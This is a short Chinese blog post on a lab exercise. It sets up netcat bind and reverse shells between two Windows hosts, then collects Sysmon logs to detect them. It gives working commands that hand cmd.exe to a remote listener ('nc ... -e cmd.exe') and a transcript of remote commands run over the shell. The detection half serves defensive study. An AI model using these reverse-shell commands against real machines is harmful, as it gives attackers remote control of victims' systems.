nc远控反弹shell小实践

正向shell:

 

132机器A上:==>是c2的client

nc.exe -L -d -e cmd.exe -p 5555

 

134机器B上:

?
1
nc64.exe XXX.132 5555

  

然后就可以输入命令远控132机器了!

 

我的nc都放在了桌面,所以在桌面cmd即可!

 

 

反弹shell例子:

134主机A上,运行如下命令监听8888端口:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
 
C:\Users\qiankun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C6C4-46F7
 
 Directory of C:\Users\qiankun\Desktop
 
08/01/2022  01:23 AM    <DIR>          .
08/01/2022  01:23 AM    <DIR>          ..
05/11/2022  01:09 AM    <DIR>          619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022  08:35 PM    <DIR>          80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022  12:38 AM    <DIR>          aaabitsadmin.exe.ps1
05/16/2022  12:30 AM               616 aaabitsadmin.exe.ps1.zip
05/24/2022  12:13 AM                 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022  10:32 PM       104,857,751 Agent.log
05/23/2022  02:38 AM                 3 agent.ps1
06/13/2022  02:14 AM         8,447,018 Agent_1.log
06/09/2022  11:48 PM    <DIR>          b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022  11:37 PM         1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022  07:55 PM               208 bitsadmin.exe.ps1
08/04/2017  02:19 AM            75,418 COM Object hijacking persistence.ps1
04/21/2022  02:30 AM    <DIR>          dev
04/14/2022  11:22 PM               167 exit.bat
03/24/2022  08:41 AM             2,348 Microsoft Edge.lnk
04/19/2022  12:30 AM            24,896 msxsl.exe
07/31/2022  09:00 PM            38,616 nc.exe
07/31/2022  09:00 PM            45,272 nc64.exe
08/01/2022  01:14 AM         5,980,919 nc_miansha.exe
04/13/2022  11:23 PM         1,436,160 NeverLose.bin.exe
05/23/2022  02:37 AM                 0 New Text Document.txt
05/23/2022  02:49 AM    <DIR>          nishang-master
05/23/2022  02:39 AM            80,249 nishang-master.zip
06/10/2022  12:42 AM    <DIR>          Office Tool
06/09/2022  11:54 PM     2,085,551,571 Office Tool.zip
05/18/2022  02:43 AM    <DIR>          phpStudy_64
05/17/2022  07:55 PM        81,485,042 phpStudy_64.zip
07/31/2022  10:04 PM    <DIR>          PSTools
07/31/2022  09:10 PM         4,089,627 PSTools.zip
05/23/2022  11:39 PM    <DIR>          QianKunEDR-Windows-x64-Setup
07/31/2022  07:11 PM    <DIR>          QianKunEDR-Windows-x64-Setup (5)
07/31/2022  06:51 PM        90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022  11:28 PM       108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022  11:22 PM                65 start.bat
05/06/2022  02:25 AM    <DIR>          Sysmon
05/06/2022  02:14 AM         3,263,064 Sysmon.zip
05/16/2022  02:44 AM    <DIR>          test
05/24/2022  02:10 AM            10,522 test.chm
07/31/2022  06:46 PM         3,607,096 winrarx64.610scp.exe
05/07/2022  12:53 AM    <DIR>          x64
04/14/2022  02:30 AM             1,892 XXX.sct
              27 File(s)  2,499,313,244 bytes
              16 Dir(s)  17,187,168,256 bytes free
 
C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun
 
C:\Users\qiankun\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : XXX
   IPv4 Address. . . . . . . . . . . : XXXX
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : XXX

  

132机器B上,运行如下命令,去主动连接A机器:

nc XXX.134IP 8888 -t -e cmd.exe

 

然后就可以在134机器A上控制机器B了。

 

数据采集和检测:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
日期和时间   来源  事件 ID   任务类别   
2022/11/15 17:42    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:42:51.576
ProcessGuid: {95699A2E-0F5B-6373-0119-040000000C00}
ProcessId: 1908
PipeName: \lsass
Image: C:\Windows\system32\mmc.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:31.750
ProcessGuid: {95699A2E-5E8F-6373-7519-040000000C00}
ProcessId: 3440
Image: C:\Windows\System32\whoami.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=EC2231C0FEA6B821A5ED097419744205,SHA256=C36CF78F2257F606AB67B14AFB02DCA652A3FA6907C7805EFBD2D47241EE609A,IMPHASH=33138CA52B3F4A94BA90037F3DE01CB2
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:20.362
ProcessGuid: {95699A2E-5E84-6373-7419-040000000C00}
ProcessId: 4808
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: ipconfig
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=CF45949CDBB39C953331CDCB9CEC20F8,SHA256=34DF739526C114BB89470B3B650946CBF7335CB4A2206489534FB05C1FC143A8,IMPHASH=BBBA00511B8BEF70143B0EEBBB337273
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    3   Network connection detected (rule: NetworkConnect)  "Network connection detected:
RuleName: Usermode
UtcTime: 2022-10-14 17:11:18.718
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.203.128
SourceHostname: dw-PC.localdomain
SourcePort: 49405
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.203.130
DestinationHostname: -
DestinationPort: 7777
DestinationPortName: -"
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ProcessId: 5016
Image: C:\Windows\System32\cmd.exe
FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A
ParentProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ParentProcessId: 3876
ParentImage: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
ParentCommandLine: nc64.exe  -e cmd.exe 192.168.203.130 7777
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40    Microsoft-Windows-Sysmon    17  Pipe Created (rule: PipeEvent)  "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    17  Pipe Created (rule: PipeEvent)  "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: nc64.exe  -e cmd.exe 192.168.203.130 7777
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=523613A7B9DFA398CBD5EBD2DD0F4F38,SHA256=3E59379F585EBF0BECB6B4E06D0FBBF806DE28A4BB256E837B4555F1B4245571,IMPHASH=567531F08180AB3963B70889578118A3
ParentProcessGuid: {95699A2E-5924-6373-6B19-040000000C00}
ParentProcessId: 2680
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: ""C:\Windows\System32\cmd.exe""
ParentUser: dw-PC\dw"

  

posted @   bonelee  阅读(376)  评论(0编辑  收藏  举报
相关博文:
· CVE-2022-30190漏洞复现和检测——属于典型的无文件攻击场景之一
· 反弹shell的实现方式和检测方法——常规攻击可以直接检测,pipe方式需要结合关联分析(图关联最好),如果含有混淆脚本,需要无文件攻击检测
· [20230309]nc reverse bash shell or cmd.exe(windows).txt
· 反弹shell原理和常见反弹shell方式
· 在 Windows Server 2022 管理和维护中非常常用CMD命令的功能涵盖了文件操作、磁盘管理、网络配置、系统管理等方面,。
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
点击右上角即可分享
微信分享提示